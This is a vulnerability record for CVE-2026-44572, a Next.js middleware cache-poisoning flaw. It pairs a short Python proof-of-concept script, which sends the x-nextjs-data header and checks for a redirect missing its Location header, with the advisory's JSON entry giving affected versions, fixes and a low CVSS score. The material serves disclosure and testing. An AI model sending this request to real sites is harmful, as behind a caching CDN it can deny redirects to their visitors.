CVE-2026-44572

import requests # Target URL (A path handled by middleware that redirects) target_url = "http://example.com/login" # The malicious header that triggers the vulnerability headers = { "x-nextjs-data": "1", "User-Agent": "PoC-Client/1.0" } try: # Send request without following redirects response = requests.get(target_url, headers=headers, allow_redirects=False) print(f"Status Code: {response.status_code}") print(f"Location Header: {response.headers.get('Location')}") print(f"x-nextjs-redirect Header: {response.headers.get('x-nextjs-redirect')}") # Check for vulnerability signs: 3xx status, missing Location, presence of x-nextjs-redirect if 300 <= response.status_code < 400: if not response.headers.get('Location') and response.headers.get('x-nextjs-redirect'): print("[+] Potential CVE-2026-44572 vulnerability confirmed!") print("[+] The cache may be poisoned if behind a CDN.") else: print("[-] Normal redirect behavior observed.") else: print("[-] Target did not return a redirect status.") except Exception as e: print(f"Error connecting to target: {e}")

{"cve": {"id": "CVE-2026-44572", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:58.800", "lastModified": "2026-05-13T16:58:40.557", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data header on a normal request to a path handled by middleware that returns a redirect. When that happened, the middleware/proxy could treat the request as a data request and replace the standard Location redirect header with the internal x-nextjs-redirect header. Browsers do not follow x-nextjs-redirect, so the response became an unusable redirect for normal clients. If the application was deployed behind a CDN or reverse proxy that caches 3xx responses without varying on this header, a single attacker request could poison the cached redirect response for the affected path. Subsequent visitors could then receive a cached redirect response without a Location header, causing a denial of service for that redirect path until the cache entry expired or was purged. This vulnerability is fixed in 15.5.16 and 16.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-349"}]}], "references": [{"url": "https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq", "source": "[email protected]"}]}}